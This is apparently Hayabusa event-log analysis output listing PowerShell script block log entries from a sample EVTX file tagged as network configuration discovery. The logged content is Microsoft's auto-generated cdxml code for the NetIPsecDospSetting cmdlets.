$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,")')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
